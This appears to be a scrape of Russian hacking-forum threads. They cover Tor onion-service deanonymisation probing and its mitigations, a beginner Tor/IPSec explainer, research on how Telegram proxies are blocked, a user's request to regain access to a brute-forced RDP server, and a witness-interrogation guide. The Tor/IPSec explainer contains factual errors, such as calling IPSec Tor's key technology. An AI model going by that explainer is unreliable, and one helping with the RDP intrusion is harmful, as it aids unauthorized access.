14:19:22 Tor[17199]: Rendezvous [$11C9529C9D0671545EAEF80DFE209AD977BCE908~$11C9529C9D0671545E at 95.91.4.56] Jan 30 14:19:22 Tor[17199]: Rendezvous: Circuit closing [30/Jan/2020:14:19:23 -0700] "web.archivecrfip2lpi.onion" 404 7782 "" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" [30/Jan/2020:14:19:23 -0700] "web.archivecrfip2lpi.onion" 404 7872 "" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" Jan 30 14:19:23 Tor[17199]: message repeated 9 times: [ Rendezvous: Circuit closing] Jan 30 14:19:23 Tor[17199]: Rendezvous: Circuit closing

Все эти точки встречи являются известными узлами Tor. Наблюдаемое поведение провоцируется агрессивным сканером, порождающим одновременного много процессов сканирования.

Сообщения Circuit closing означают, что мой сервер обнаружил сканер и заблокировал его перед первым GET-запросом. Мое обнаружение имеет ноль ложных срабатываний. То, как вы устанавливаете соединения через Tor, является строго определенным и профилируемым атрибутом. Вы не анонимны.

Вперёд наоборот
Еще в 2017 году я упомянул об одном странном злоумышленнике. Я не знаю точно, чего он хотел. Но так как это не обычный пользователь, я классифицирую его действия как атаку. Если он указывал адрес точки встречи, то адрес отображался в неправильном порядке байтов. Например, 95.216.53.157 является известным узлом Tor, но этот бот запрашивал rendezvous, используя обратный порядок: 157.53.216.95. Обратный адрес уже не является известным узлом Tor. Даже fingerprints сервера были неправильными. В результате запросы соединения не выполнялись, но это не мешало ему пытаться снова и снова.

Это продолжалось годами. Как ни странно, иногда соединение проходило успешно. Я подозреваю, что злоумышленник управлял некоторыми враждебными узлами. Если он видел обратный адрес или неправильный fingerprints, он исправлял их. Это можно было использовать в качестве флага для отслеживания объема трафика или идентификации последнего узла в цепочке Tor моего сервера.

Бот с частным адресом
В конце прошлого года бот-любитель обратных адресов был остановлен. Он был заменен ботом «с частным адресом». Вот несколько примеров:

Code:Copy to clipboard

Jan 30 07:35:59 Tor[24247]: Rendezvous [$6B4108C2ACE1A805173B756A138A50C8770DAD2F~$6B4108C2ACE1A80517 at 149.248.4.19] Jan 30 07:36:01 Tor[24247]: Rendezvous [$6B4108C2ACE1A805173B756A138A50C8770DAD2F~$6B4108C2ACE1A80517 at 149.248.4.19] Jan 30 07:36:03 Tor[24247]: Rendezvous [$6B4108C2ACE1A805173B756A138A50C8770DAD2F~$6B4108C2ACE1A80517 at 149.248.4.19] Jan 30 07:36:04 Tor[24247]: Rendezvous [$6B4108C2ACE1A805173B756A138A50C8770DAD2F~$6B4108C2ACE1A80517 at 149.248.4.19] Jan 30 07:36:06 Tor[24247]: Rendezvous [$6B4108C2ACE1A805173B756A138A50C8770DAD2F~$6B4108C2ACE1A80517 at 149.248.4.19] Jan 30 07:36:08 Tor[24247]: Rendezvous [$6B4108C2ACE1A805173B756A138A50C8770DAD2F~$6B4108C2ACE1A80517 at 149.248.4.19] Jan 30 07:36:09 Tor[24247]: Rendezvous [$6B4108C2ACE1A805173B756A138A50C8770DAD2F~$6B4108C2ACE1A80517 at 149.248.4.19] Jan 30 07:36:10 Tor[24247]: Rendezvous [$6B4108C2ACE1A805173B756A138A50C8770DAD2F~$6B4108C2ACE1A80517 at 149.248.4.19] Jan 30 07:36:11 Tor[24247]: Rendezvous [$6B4108C2ACE1A805173B756A138A50C8770DAD2F~$6B4108C2ACE1A80517 at 149.248.4.19] Jan 30 09:35:11 Tor[24247]: Rendezvous [$7285A9997A37F9BB39C8007FA975331DE84F48A1~$7285A9997A37F9BB39 at 139.180.198.17] Jan 30 09:35:20 Tor[24247]: Rendezvous [$7285A9997A37F9BB39C8007FA975331DE84F48A1~$7285A9997A37F9BB39 at 139.180.198.17] Jan 30 09:35:21 Tor[24247]: Rendezvous [$7285A9997A37F9BB39C8007FA975331DE84F48A1~$7285A9997A37F9BB39 at 139.180.198.17] Jan 30 09:35:21 Tor[24247]: Rendezvous [$7285A9997A37F9BB39C8007FA975331DE84F48A1~$7285A9997A37F9BB39 at 139.180.198.17] Jan 30 09:35:22 Tor[24247]: Rendezvous [$7285A9997A37F9BB39C8007FA975331DE84F48A1~$7285A9997A37F9BB39 at 139.180.198.17] Jan 30 09:35:23 Tor[24247]: Rendezvous [$7285A9997A37F9BB39C8007FA975331DE84F48A1~$7285A9997A37F9BB39 at 139.180.198.17] Jan 30 09:35:23 Tor[24247]: Rendezvous [$7285A9997A37F9BB39C8007FA975331DE84F48A1~$7285A9997A37F9BB39 at 139.180.198.17] Jan 30 09:35:24 Tor[24247]: Rendezvous [$7285A9997A37F9BB39C8007FA975331DE84F48A1~$7285A9997A37F9BB39 at 139.180.198.17] Jan 30 09:35:25 Tor[24247]: Rendezvous [$7285A9997A37F9BB39C8007FA975331DE84F48A1~$7285A9997A37F9BB39 at 139.180.198.17] Jan 30 09:35:26 Tor[24247]: Rendezvous [$7285A9997A37F9BB39C8007FA975331DE84F48A1~$7285A9997A37F9BB39 at 139.180.198.17] Jan 30 13:02:24 Tor[17199]: Rendezvous [$7555AE0CF28142B4BF82E3BDAF006338D72C1123~$7555AE0CF28142B4BF at 45.76.134.212] Jan 30 13:02:24 Tor[17199]: Rendezvous [$7555AE0CF28142B4BF82E3BDAF006338D72C1123~$7555AE0CF28142B4BF at 45.76.134.212] Jan 30 13:02:25 Tor[17199]: Rendezvous [$7555AE0CF28142B4BF82E3BDAF006338D72C1123~$7555AE0CF28142B4BF at 45.76.134.212] Jan 30 13:02:27 Tor[17199]: Rendezvous [$7555AE0CF28142B4BF82E3BDAF006338D72C1123~$7555AE0CF28142B4BF at 45.76.134.212] Jan 30 13:02:27 Tor[17199]: Rendezvous [$7555AE0CF28142B4BF82E3BDAF006338D72C1123~$7555AE0CF28142B4BF at 45.76.134.212] Jan 30 13:02:28 Tor[17199]: Rendezvous [$7555AE0CF28142B4BF82E3BDAF006338D72C1123~$7555AE0CF28142B4BF at 45.76.134.212] Jan 30 13:02:29 Tor[17199]: Rendezvous [$7555AE0CF28142B4BF82E3BDAF006338D72C1123~$7555AE0CF28142B4BF at 45.76.134.212] Jan 30 13:02:30 Tor[17199]: Rendezvous [$7555AE0CF28142B4BF82E3BDAF006338D72C1123~$7555AE0CF28142B4BF at 45.76.134.212] Jan 30 13:02:31 Tor[17199]: Rendezvous [$7555AE0CF28142B4BF82E3BDAF006338D72C1123~$7555AE0CF28142B4BF at 45.76.134.212] Jan 30 13:02:31 Tor[17199]: Rendezvous [$7555AE0CF28142B4BF82E3BDAF006338D72C1123~$7555AE0CF28142B4BF at 45.76.134.212]

Как правило, одновременно отправляются 8-10 запросов, повторяясь несколько раз в час. IP-адреса не случайны. Я посмотрел, что одни и те же IP-адреса поступают партиями. Согласно metrics.torproject.org, IP- адреса и fingerprints не являются известными узлами Tor. Они даже не отображаются в кэше известных дескрипторов моего демона. Однако эти IP-адреса работают под управлением Tor и имеют открытый порт OR (9001/tcp).

В отличие от бота-любителя обратных адресов, который предоставлял фиктивные адреса, все эти IP-адреса соответствуют известным облачным провайдерам. Обычно это Choopa LLC – облачный провайдер, который регулярно используется при [враждебных атаках](https://umbrella.cisco.com/blog/2015/09/14/phishing- spiking-and-bad-hosting/).

Насколько я могу судить, бот стреляет такими пакетами и ждёт откликов от узла Tor. Таким образом, он узнаёт, что мой onion сервис использует этот конкретный узел в relay узле Tor.

Цепочка узлов Tor
Если вы используете Tor Browser, то вы можете просмотреть свою схему Tor (путь через сеть Tor). Например:

Типичный путь между браузером и onion сервисом Tor состоит из 7 переходов: от моего браузера до моего guard (в данном примере расположенного в Великобритании) и через два relay узла (Франция и Германия). У сервиса onion также есть его guard и два relay, которые неизвестны браузеру Tor. На рисунке показано «Relay, Relay Relay», но самый нижний relay узел на деле соответствует guard сервиса. Итак, это две цепочки узлов Tor – одна от браузера, другая от службы – которые встречаются посередине.

Что же делает злоумышленник? Я думаю, что пытается наметить следующий неизвестный relay! И так как цепочка меняется каждые несколько минут, он постоянно опрашивает текущий последний relay, используемый моим onion сервисом.

Цепные эксплойты
Определение последнего узла в цепочке не говорит атакующему, где я нахожусь. Однако это предоставляет злоумышленнику полезную информацию. Что он делает? Пытается найти мой guard узел.

Некоторые узлы Tor являются частью зарегистрированных семейств. Обычно это группа узлов Tor, которые работают в одной организации. Например, niftyspinymouse 5.196.213.57 является частью большого семейства связанных узлов Tor. В момент написания публикации в этом семействе было 68 активных узлов. На следуюещем скриншоте показаны только некоторые из них.

Охранный узел Tor меняется редко, даже если остальная часть цепочки часто варьируется. Более того, демон tor никогда не создаст цепочку, используя два узла, которые являются частью одного и того же известного семейства. Поэтому если кто-то видит, что маршрут использует niftyspinymouse, то он сразу знает, что мой guard узел не является ни одним из этих 68 узлов Tor.

Итак, узел guard редко меняется, но два других узла меняются часто. Опрашивая последний узел моей цепочки, злоумышленник может создать большой список исключений. Если он сможет исключить всё остальное, он найдёт мой guard узел. Если не исключит всё, то хотя бы сможет свести задачу к небольшому числу возможных guard узлов.

Идентификация возможного сторожевого узла не выдаёт реального адреса моего сервера. Однако известен тип атаки, когда атакующий DDoS'ит защитный узлел. Это отрубает guard и временно переводит мой сервис в оффлайн, пока службой не будет найден новый guard. Но охранный узел выполняет свою задачу, и не выдаёт, где находится мой сервер.

Существует второй тип атаки. Атакующий может запустить один или несколько враждебных охранных узлов. Если он сможет сбить меня с толку достаточным количеством guard-узлов, мой тор-демон в конечном итоге выберет одного из этих охранников. Тогда злоумышленник сможет определить мой фактический сетевой адрес и напрямую атаковать мой сервер. Так и произошло со мной однажды.

Наконец, демон tor отслеживает плохие узлы. Если злоумышленник сможет заставить моего демона tor пометить достаточное количество узлов как плохие, атакующий сможет перевести мою службу в офлайн, потому как процесс tor не сможет подключиться ни к одному охранному узлу. И такое тоже случалось со мной раньше. Это был один из самых неприятных перерывов в работе моей onion службы.

Подавления атак
Есть несколько вариантов подавления. Я использую их, но сомневаюсь, что другие делают так же. Каждый из подходов требует программирования. К сожалению, проект Tor был не слишком открыт для реализации какого-либо из перечисленных вариантов.

Первый вариант – использовать ExcludeNodes torrc для исключения целых стран (например, ExcludeNodes {br},{ru},{pl} ) вместе со "StrictNodes 1". Это говорит моему демону tor, что он никогда не будет намеренно подключаться к узлам в некоторых странах. Пытаясь идентифицировать мой защитный узел, злоумышленник может исключать большую часть сети Tor. Но всегда есть как минимум несколько сотен возможных мест, где мог бы находиться мой guard – и это предполагает, что я не использую bridge. Измененный мной демон tor случайным образом исключает разные страны каждый раз, когда выбирает новый узел guard. Думаю, что проект Tor должен серьезно рассмотреть вопрос о том, чтобы сделать это параметром конфигурации для onion серверов.

Второй вариант – изменить IP-адрес сервера. Таким образом, даже если злоумышленники найдут ваш адрес, вы станете «движущейся» целью. С IPv4 вы можете застрять с фиксированным адресом, потому что доступно мало адресов. Однако если вы используете IPv6, то это относительно просто настроить. Я имею в виду, конечно, если злоумышленник каким-то образом станет моим guard, то он знает мой адрес IPv6 и может быстро сузить мою подсеть до диапазона /64 или /92. Но есть еще миллионы адресов для моего сервера. Каждый раз, когда я выбираю новый охранный узел, я могу выбрать новый адрес.

Замечание: Если бы только Tor имел лучшую поддержку IPv6. В настоящее время лишь 15% узлов Tor поддерживают IPv6, и вы не можете запустить узел Tor только для IPv6.

Третий вариант : каждый tor демон загружает список известных общедоступных узлов и сохраняет его локально во время работы. См. $HOME/.tor/cached- microdescs*. Точка встречи должна быть в этом списке, потому как у вас не должно быть частного узла rendezvous. Если бы демон tor проверял, что точка встречи известна, прежде чем пытался подключиться к ней, такой тип атаки полностью провалился бы.

Жаль, что ExcludeNodes не поддерживает ASN. В противном случае я бы предложил занести в черный список все серверы Choopa.

Заключение
Если вы запускаете какой-либо сервис в старом-добром Интернете, вы обязательно увидите слепое сканирование и обычные атаки. Эксплойты WordPress, инъекции SQL и сканирование на наличие последних уязвимостей являются обычным явлением. А на Tor? Я вижу больше атак и ботов с плохим поведением, чем обычных пользователей. И очень немногие атаки можно обобщить. Так что, с точки зрения исследователя безопасности, атаки на Tor – одни из самых креативных.

Публикация является переводом [поста](https://www.hackerfactor.com/blog/index.php?/archives/868-Deanonymizing- Tor-Circuits.html) Нила Кравеца в его блоге The Hacker Factor.
перевод @ proglib

Как на оберегает Tor Browser и криптография?

ID: 676533bbb4103b69df371d03
Thread ID: 34694
Created: 2020-01-30T16:26:12+0000
Last Post: 2020-02-02T16:27:58+0000
Author: neopaket
Prefix: Статья
Replies: 4 Views: 2K

Как нас оберегает Tor Browser и криптография?

“Вы можете спросить - как данная статья вообще
может относиться к какой либо тематике конкурса?
Криптография это довольно широкое понятие имеющее
такое же большое применение в нашей повседневной жизни.
И я уверен, что вы когда либо использовали или используете
луковичный браузер. Сегодня я предлагаю вам погрузится в чудесный
мир метод защиты нас от лишних глаз...”

Вступление.

Данная статья также подойдет для людей, которые в первый раз запустили Tor Browser и хотят ознакомиться с его функционалом и настроить его под свои нужды. Также данная статья подходит для мобильной версии Тора - Orbot.

Начинаем сначала.

При первом запуске браузер сразу же предложит настроить его по пяти пунктам:
Основные, Начало, Поиск, Приватность и Безопасность и Tor.
Мы не будем рассматривать довольно скучные первые три пункта и приступим сразу к двум последним.

Как сказано в официальной документации Tor - для анонимизации трафика пользователей используются группы серверов. Они действуют по следующему принципу. Люди соединяются с этой сетью, используя виртуальные туннели. Туннелирование - технология, при которой соединяются два конечные точки (Непосредственно ваша машина и сервер.) по средствам построения модульных сетевых протоколов. Главным плюсом такого подключения является то, что данные, которые проходят через наш туннель переходят в полной безопасности и их не получают третьи лица. Применение такой технологии совместно с шифрованием данных и называется VPN о котором вы прекрасно знаете. Мы можем применять данную технологию для просмотра информации, которая подверглась цензуре в вашей стране и соответственно анонимизации данных. Шифрование данных при помощи VPN как и простое шифрование соответственно делится на два типа, а именно на асимметричное и симметричное шифрования. О типах шифрования вы можете прочесть где угодно и это является началом и азами криптографии. Но всё же… Давайте я вам коротко расскажу о них максимально коротко.

Приступаем к самому интересному.

Симметричное шифрование максимально быстро, использует один ключ для шифровки и расшифровки и две стороны хранят этот ключ в тайне. Если злоумышленник сможет получить доступ к данному ключу, то все ваши данные естественно конфиденциальны не будут! Главным принципом данной технологии в туннелировании является то, что алгоритм шифрования (Об этом чуть позже), а также ключ заранее известен и так как пользователь не может как то повлиять (На ход и алгоритм, технологию исполнения), то всё происходит сугубо между машинами. Мы знаем, что зашифрованный текст в большинстве случаев является нечитаемым для человека. Это осуществляется за счёт шифрования текста при помощи различных алгоритмов.

Предлагаю разобрать один из таких шифров и пройти вместе с ним весь путь от вашего ПК/ноутбука/телефона ну или PDA

Самыми распространенными технологиями для шифрования, передаваемого трафика через VPN-Канал являются IPSec, PPTP и OpenVPN. Сейчас я расскажу о принципе работы данных технологии, их плюсах, минусах и применении.

IPSec (IP Security) - система протоколов, использующаяся для защиты входных данных, проверку их целостности, проводящая аутентификацию этих же данных. И самое интересное, проводящая шифрование IP-пакетов (Об этом сейчас немного и поговорим) и при помощи специального защищенного протокола передаёт те самые ключи.

IP-пакет.

IP-пакет как и всё в интернете представляет собой данные. Этот блок данных (Как ни странно) можно представить в виде обычного пакета. Он состоит из заголовка, который можно представить в виде внешнего облика пакета, который указывает на содержимое (Пример из реальной жизни. На любом пакете из магазина, нарисован бренд) и его внутренности (Всеразличные предметы).
В своей основе пакета основаны на четвёртом поколении протоколов IPv, относящийся к семейству TCP/IP протоколов.

На изображении выше, показана полная структура или даже экосистема заголовка IP-пакета.
Есть множество параметров описания пакета:

Version (Версия) - параметр, указывающий на версию протокола IPv. Ныне применяется постоянный IPv4 (Однако существуют более новые издания данного протокола).

IHL (Размер заголовка) - данный параметр нужен только для того, чтобы конечный сервер мог понимать, где начинается и соответственно заканчивается название пакета и начинаются рабочие данные.

Type Of Service (Тип сервиса) - ныне данная строка данных, используется для дифференциальных служб и указывает на способ использования датаграммы (Информация, передаваемая протоколом через сеть связи без предварительного установления соединения и создания канала между ними.).

Total Length (Общий размер) - количество октетов (Байтов), которое занимает датаграмма совместно с заголовком.

ID (Идентификация) - присуждаемый, уникальный номер, который нужен пакету для повторной сборке датаграмм, которые ранее были фрагментированы.

Flags (Обозначения) - некая единица данных, указывающая на свойства пакета:
Как мы знаем, почти (Если не во всех) во всех языках программирования 0 и 1 обозначают True и False соответственно.
Есть три пункта. Первый ни за что не отвечает и всегда зарезервирован для нуля. Второй указывает на то, можно ли фрагментировать данную датаграмму. И третий указывает на то, является ли датаграмма последней.

Frag Offset (Смещение фрагмента) - задает смещение в байтах поля данных этого фрагмента относительно начала поля данных исходного (Нефрагментированного) пакета. Смещение должно быть кратно 8 байт.

TTL (Время жизни) - количество времени во время которого дейтаграмме можно существовать в сети. Число, которое обозначено в переменной с равномерно уменьшается на единицу, а когда маршрутизатор достигнет нуля, то пакет сбрасывается и элемент перестает быть в сети.

Protocol (Протокол) - протокол (Удивительно) отправляющий дейтаграмму. Каждое из значений маршрутизатора означает использование определённого протокола: UDP - 17, TCP - 6, ICMP - 1, IGRP - 88 и OSPF - 89.

Header Checksum (Контрольная сумма заголовка) - точка привязки, используемая для обнаружения ошибок, которые могут быть обнаружены в ходе передачи и хранений IP-пакетов (Интересный факт: В IPv6 данный блок убрали)

Специфика IPSec.

IPSecurity может существовать в двух функциональных режимах. А именно в транспортном и туннельном. При помощи транспортного режима могут шифроваться только лишь IP-пакетов, а заголовки остаются исходными. Такой режим используются для установления между хостами связи или для защиты тоннелей. В тоже время туннельный режим шифрует всё вплоть до заголовка пакета. Этот режим используют для безопасного подключения к открытой сети Интернет или безопасной передачи данных через частный сети или при помощи удалённой машины.

Как же работает IPSec?

Сначала в нашем узле, поддерживающим технологию IPSec, создаётся “Политика Безопасности”, которая хранится в SPD (База данных политики безопасности).
Далее мы приступаем к IKE. IKE - это процесс при котором две машины проходят аутентификацию и передают друг другу секретные ключи о которых мы ранее говорили.Также существует более новая версия данного протокола - IKEv2, который совмещает все шаги всего в одну фазу. Ниже приведена более подробная информация о данных шагах:

Номер один. Для начала между машинами происходит обмен информации о алгоритмах и хеш-функциях, которые будут далее использоваться. Предлагаю немного пояснить, хеш-функция - алгоритм при котором входная информация произвольной длины преобразуется в хеш определённой длины при помощи определённой технологией. Данное действие называется хешированием, а входные данные называют сообщениями.

Для начала обе стороны передают друг другу секретные ключи и при этом производят идентификацию друг другу при помощи отправки и дальнейшей проверки случайных числовых значений.
При помощи зашифрованного IP-адреса производится проверка сторон и в итоге всего создаётся безопасный ISAKMP канал для обмена.
ISAKMP- протокол для установления ассоциации безопасности (SA - следует запомнить) и крипто-ключей в среде интернет.

От устройства IKE перейдём обратно к IPSec. Второй этап работы данного протокола и является ранее рассмотренным алгоритмом работы IKE. И следовательно третий этап является вторым шагом работы IKE. И наконец то, начинается процесс передачи информации между машинами, который достигается построением IPSec туннеля, используя протоколы указанные в SA.
Если время жизни IP-пакетов кончаются, то действующий IP-пакет “закрывает” туннель и ранее описанный алгоритм начинается заново с первой или второй фазы.

Вот мы рассмотрели самую важную технологию Tor. Именно для этого его чаще всего и используют.

Я вас благодарю за прочтение данной статьи. Она была написана для ознакомления вас с основными принципами работы нашего лукового браузера. Статья не рассказывает обо всех технических особенностях ранее описанных технологий, это моя третья авторская статья и мне кажется, что только читатель может оценить её по достоинству и отметить все минусы. Буду рад любой вашей критике.

Спасибо...

Как в России собирают IP-адреса проксей Telegram

ID: 676533bbb4103b69df371d79
Thread ID: 27420
Created: 2019-01-22T16:32:36+0000
Last Post: 2019-01-22T16:32:36+0000
Author: tabac
Replies: 0 Views: 2K

Как в России собирают IP-адреса проксей Telegram. О снифферах в московском метро и бранчах блоклистов РКН.

Данные к докладу на CryptoInstallFest 5 (22 сентября 2018).

Предположительно:

МаксимаТелеком или аплинки (МТС? Мегафон?) слушают трафик в поисках Socks5 проксей

по результатам "прослушки" ходит сканер

некоторые провайдеры блокируют IP адреса раньше, чем РКН добавляет адрес в "общие" выгрузки

[![](/proxy.php?image=https%3A%2F%2Fgithub.com%2Fdarkk%2Frkn-git- flow%2Fraw%2Fmaster%2Fthe_fastest_draw.png&hash=6fc670d3f510165f56c9b53374400f15)](https://github.com/darkk/rkn- git-flow/blob/master/the_fastest_draw.png)

Детали
При использовании Socks5 для соединения с Telegram из сети MT_FREE Московского Метро (провайдер МаксимаТелеком) через полчаса-час на адрес Socks5 приходит сканер с адреса 178.176.30.221 из "клиентской" сети Мегафона, судя по PTR записям вида clients-221.30.176.178.misp.ru..

Сканер портов проверят доступность TCP порта полу-открытым сканированием (SYN, SYN-ACK, RST). После успешной проверки сканер пытается установить Socks5 соединение с сервером из подсети Telegram 91.108.56.186:443 и произвести обмен данными с ним.

Через час-полтора после прихода сканера НЕКОТОРЫЕ провайдеры начинают блокировать доступ к просканированному серверу: МГТС, МТС, Мегафон, Yota, Билайн и др.

Ещё через час-полтора IP адрес появляется в "выгрузке" и "дельтах", при этом отметка времени ts у IP-адреса соответствует времени появления в выгрузке и "отстаёт" от времени начала блокировки на выделенных провайдерах.

Механика эксперимента

установить haproxy, перенаправляющий Socks5 и TLS трафик на разные бэкенды (nginx с preread работать не будет, т.к. он читает минимум 5 байт, а первый пакет хэндшейка Socks5 — 3 или 4 байта)

выделить зонды RIPE Atlas в России, которые находятся в сетях, фильтрующих по списку РКН

запустить измерение SSLCert на сервер с этих зондов с периодичностью 3 минуты для проверки доступности TCP порта

перевести телефон в оффлайн

сконфигурировать Telegram на использование сервера

подключиться к сети MT_FREE в метро, сделать круг по кольцевой линии, отключиться от MT_FREE

удалить прокси-сервер из Telegram клиента (чтоб случайно не подключиться к нему через оператора сотовой связи или другого провайдера)

подождать несколько часов и завершить измерение через RIPE Atlas

Таймлайн эксперимента s5tg-01

00:32 приход сканера

00:47 наблюдается блокировка на Yota

00:52 наблюдается блокировка на МГТС

01:38 в выгрузке с updateTime="2018-09-20T01:38:00+03:00" всё ещё нет блокировки

01:57 блэкхол на looking glass Beeline

03:30 <ip ts="2018-09-20T03:30:00+03:00">45.56.118.171</ip>

Графики по другим эксприментам с данными RIPE Atlas:

s5tg-02

s5tg-03

s5tg-04

s5tg-05

Автор: Leonid Evdokimov aka darkk

Вылетает с RDP

ID: 676533bbb4103b69df371d05
Thread ID: 33406
Created: 2019-11-24T06:08:01+0000
Last Post: 2019-11-27T09:40:55+0000
Author: cardin
Replies: 7 Views: 2K

Народ привет!
Подскажите в чём проблема и как её устранить: зашёл на дедик сбрученный, всё ок, полазил там в было норм. Начал делать скриншот, скопировал в буфер обмена,на серваке в пэинт закидывал и тут выдало ошибку: ошибка буфера обмена. Теперь делаю коннект к этому деду - грузит рабочий стол и сразу выкидывает. На рабочем столе так же открыты окна, которые я открывал, пасс не поменян.
В чём причина и как мне теперь попасть на него ? )

Как вести себя на допросе?!

ID: 676533bbb4103b69df371d07
Thread ID: 33464
Created: 2019-11-26T11:37:58+0000
Last Post: 2019-11-26T11:37:58+0000
Author: wulkan
Prefix: Статья
Replies: 0 Views: 2K

Многие когда узнают что их вызывают на допрос теряются и не знают что им делать.

Кто такой свидетель
В соответствии со ст. 56 УПК РФ: свидетелем является лицо, которому могут быть известны какие-либо обстоятельства, имеющие значение для расследования и разрешения уголовного дела, и которое вызвано для дачи показаний ….

То есть в обыденном понимании “свидетель” – это тот, кому что либо известно по этому делу. Не путайте понятие “свидетель” и “подозреваемый” или “обвиняемый”.

Если вас вызвали на допрос в качестве свидетеля, то следователь или дознаватель намерен получить необходимую информацию как можно быстрее.

Свидетеля не могут задержать

Задержать лицо могут, только если “свидетель” в ходе допроса будет переквалифицирован на “подозреваемого”. Тогда следователь вправе задержать “подозреваемого” на срок до 10 суток или больше (до 45 суток в определенных случаях) до предъявления обвинения.

Поэтому, вы можете войти в кабинет следователя “свидетелем”, а выйти из него уже “подозреваемым”, которого могут задержать.

Получили повестку или вам позвонил следователь
Существует два основных способа вызова на допрос свидетеля:

Вам, вашим родственникам или вашему начальству на работе вручат повестку. По почте такие документы посылают редко;

Вам позвонит следователь и пригласит на допрос.

Как показывает практика следователь обычно использует оба метода, чтобы исключить вероятность того, что свидетель проигнорирует повестку и решит не являться на допрос.

Причем вручить повестку может как ваш участковый, так и обычный почтальон. А потом вам еще и позвонят и пригласят на допрос.

Разберем обе ситуации.

Повестка
В соответствии со статьей 188 УПК РФ: свидетель вызывается на допрос повесткой.

Повестка вручается свидетелю под расписку. Если свидетеля не застали, то повестка вручается совершеннолетнему члену его семьи либо она передается администрации по месту его работы или иным лицам и организациям, которые обязаны передать повестку свидетелю.

Обычно повестка выглядит следующим образом:

Каждый человек вправе решать самостоятельно, что делать при получении повестки. Мы рекомендуем непременно явиться на допрос, не игнорируя повестку.

Если вы всё же решили не являться на допрос, что делать
Классическим способом вызова свидетеля на допрос считается именно оповещение посредством заказного письма, так как в этом случае следователь получит доказательство, что получатель был извещен о письме!

Для достижения поставленной цели, как правило, заказное письмо отправляется с уведомлением.

Если получатель уведомления отсутствует дома на момент доставки повестки, она вручается совершеннолетнему члену семьи, либо коллегам по работе (также под роспись).

В случае, когда следователь принимает решение об отправке заказного письма, свидетель получает только уведомление о необходимости явиться в почтовое отделение по указанному адресу и забрать заказное письмо.

Если письмо по истечении 5-7 дней будет возвращено следователю, а уведомление было вам передано (вам просто бросили в ваш почтовый ящик квиток Уведомления), то оно будет считаться доставленным вам, т.е. на бумаге вы были предупреждены о вызове, даже если не знали об этом. Поэтому вы уже не сможете утверждать, что не знали о вызове на допрос.

_На фото можно увидеть образец уведомления.

_

Итак, если повестка не была вручена лично, и вы за нее не расписывались, то конечно можно уклониться от явки на допрос на том основании, что вас никто не поставил в известность. Но эта позиция на наш взгляд является спорной, так как вам придется доказывать почему вы не узнали о повестке от ваших близких, если вы фактически проживаете по этому адресу и не уезжали в командировку или в отпуск. А если уезжали, то будьте добры, покажите билеты и так далее и тому подобное.

Если же вам доставили повестку лично и вы за нее расписались, то на допрос придется явиться.

Что еще можно сделать
Сразу после получения повестки следует обратить внимание на основные сведения, которые обязательно должны быть упомянуты:

время допроса;

дата допроса;

процессуальные действия;

в каком качестве вы вызваны;

кто вызывает на допрос;

контакты следователя.

К примеру, если в повестке не указано в каком качестве вы вызваны, на повестке либо отдельным письмом следует написать следующий текст:

«В связи с тем, что не указан мой процессуальный статус, в рамках которого меня планируют опросить/допросить, я не могу явиться, так как невозможно определить, понадобится ли мне оказание квалифицированной юридической помощи. Прошу вас в письменной форме сообщить мне о моем процессуальном статусе».

Письмо следует отправлять с уведомлением, возможна отправка факсом. Такой способ поможет отсрочить дату допросу на некоторое время.

Телефонный звонок
Второй способ оповещения – это телефонный звонок. Что касается телефонного звонка, люди по незнанию думают, что его можно проигнорировать, не придать значения, но это не так. Доказательством получения уведомления в этом случае будет являться запись телефонного следователя и свидетеля. Поэтому в случае, когда вы ответили на телефонный звонок, следует явиться на допрос в указанный день.

Вежливо поинтересуйтесь личностью звонящего, если человек не сообщает вам данные, попросите вызывать вас повесткой. Не забудьте узнать все необходимые сведения (адрес, кабинет, дату, в качество кого вас будут допрашивать и тд.), уточните сколько это займёт времени. Постарайтесь проявить заинтересованность и по возможности оказывайте содействие следственным органам.

Законность процедуры – это правило не только для следователя, но и для вас. Если вам кажется, что следователь нарушает законность процедуры вызова на допрос, то можно предположить, что нарушения будут и в дальнейшем. Чтобы предупредить эти нарушения, вы должны подчеркнуть свое желание соблюдать закон и потребовать от следователя того же.

Если у вас есть адвокат, обязательно согласуйте с ним свой визит к следователю.

Успокаиваемся перед допросом
В первую очередь нужно знать, что сам процесс допроса в качестве свидетеля является для неподготовленного человека нервозным процессом, соответственно, необходимо постараться успокоиться.

Вам нужно успокоиться

Второе, если вы в ходе данного следственного действия знаете, что никого отношения к событиям преступления не имеете, а также являетесь, соответственно, потерпевшим по делу, то вам опасаться нечего.

Однако с открытым забралом на допрос в качестве свидетеля без адвоката мы вам всё-таки ходить не советуем.

Как не пойти на допрос после получения повестки
Прежде всего, законные требования следователя о вызове на допрос игнорировать нельзя. В случае неявки вы, как минимум, можете быть оштрафованы.

А также следователь может принудительно доставить вас на допрос в качестве свидетеля.

Если вы все же не планируете являться на допрос, то единственной уважительной причиной в данной ситуации является только болезнь. Вы должны будете предоставить следователю так называемый листок нетрудоспособности, который подтвердит, что вы заболели и не могли вовремя явиться на допрос.

На допрос можно не пойти только, если есть листок нетрудоспособности.

Иные причины не явки на допрос в качестве свидетеля являются неуважительными, соответственно, с точки зрения следователя являются незаконными. Поэтому вызов на допрос в качестве свидетеля игнорировать нельзя.

Идем на допрос с адвокатом
На допрос в качестве свидетеля мы советуем являться с адвокатом. Есть три правовых аспекта, которые позволяют вам в этом моменте избежать некоторых нюансов.

Адвокат в ходе допроса имеет право давать вам необходимую юридическую консультацию. Это полезно.

Сразу после допроса в качестве свидетеля, следователь может перейти к осуществлению иных следственных действий, которые порой могут круто изменить в дальнейшем вашу жизнь – в ходе допроса “свидетель” может стать “подозреваемым”. Поэтому своевременная юридическая помощь адвоката имеет значение.

Адвокат во время допроса следит, чтобы ваши показания не были искажены. Заявляет необходимые доказательства и пресекает иное психологическое давление в ходе допроса.

Как проходит допрос
Допрос можно условно разделить на несколько частей:

Предварительная стадия. Здесь происходит установление личности свидетеля, разъясняются его права в соответсвии с УПК;

Стадия свободного рассказа. Свидетель в свободной форме излагает известные ему обстоятельства по делу;

Вопросно-ответная стадия. Стадия на которой следователь выясняет информацию по интересующим его вопросам.Обратите внимание — вопросы должны ставиться в ясной и четкой форме. Задавать наводящие вопросы запрещается (ч. 2 ст. 189 УК РФ);

Стадия процессуального оформления полученных показаний — полученные показания заносятся в протокол.

Прежде чем подписать протокол, убедитесь, что там нет свободных мест (или они перечеркнуты). Если у вас есть какие-либо замечания — вы можете сообщить о них в соответствующей графе.

